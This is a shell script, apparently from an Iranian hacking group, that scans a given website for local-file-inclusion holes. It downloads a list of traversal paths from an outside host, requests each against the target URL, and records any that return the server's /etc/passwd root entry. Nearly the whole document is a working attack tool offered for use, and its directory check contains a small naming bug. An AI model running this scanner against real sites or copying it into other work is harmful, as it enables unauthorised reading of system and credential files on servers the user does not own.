#!/bin/sh # "*****************************************************************" # "* In The Name Of ALLAH *" # "* IrIsT LFI Scanner *" # "* www.IrIsT.Ir *" # "* Coded By : Beni_Vanda *" # "* Gr33tz : Am!r ,C0dex ,B3HZ4D ,TaK.FaNaR ,0x0ptim0us *" # "* m3hdi ,F@rid ,Dr.Tofan ,Dj.TiniVini ,Noter ,Spy Developer *" # "* Net.W0lf ,M4F1 ,joker_s ,Godfather ,Mr.CrazyWeb ,esikley *" # "* one hacker alone ,IR Anonymous ,Sukhoi SU-71 ,Mr.N!m@ *" # "* && All Turkish/Iranian/Kurdish Hackerz *" # "* Beni_Vanda@yahoo.com *" # "*****************************************************************" First_Arg=$1 function Usage() { echo "" echo "# ***************************************************************************#" echo "# Usage : lfi-scanner.sh [URL] *#" echo "# Help : --help : Show This Menu *#" echo "# RunScript : chmod 0755 perm to script and run it ./lfi-scanner.sh <url> *#" echo "# ***************************************************************************#" echo "" } function CheckArguments() { if [[ $First_Arg == "--help" ]]; then Usage; fi if [[ $First_Arg == "" ]]; then echo "[*] Wrong parameter! [URL] should be given!" echo "" exit 1; fi } function CheckIsInjectable() { echo "Vulnerability URL's will be Store at Vulnerability_list.txt ..." echo "starting ..." for url in `cat lfi-path.txt` do wget -o download_url.log -O lfi.html $First_Arg$url str=`grep "root:x:0:0:root:/root:/bin/bash" lfi.html` if [[ $str = "" ]] then echo "[*] Trying ... >> Not Found " rm lfi.html; else echo "[*] Trying ... >> Found " echo $First_Arg$url >>Vulnerability_list.txt fi done } function main() { if [[ ! -d IrIsLFI ]]; then mkdir IrIsTLFI; fi cd IrIsTLFI; wget -o download_path.log http://benivanda.persiangig.com/tools/lfi-path.txt CheckArguments; CheckIsInjectable; } main;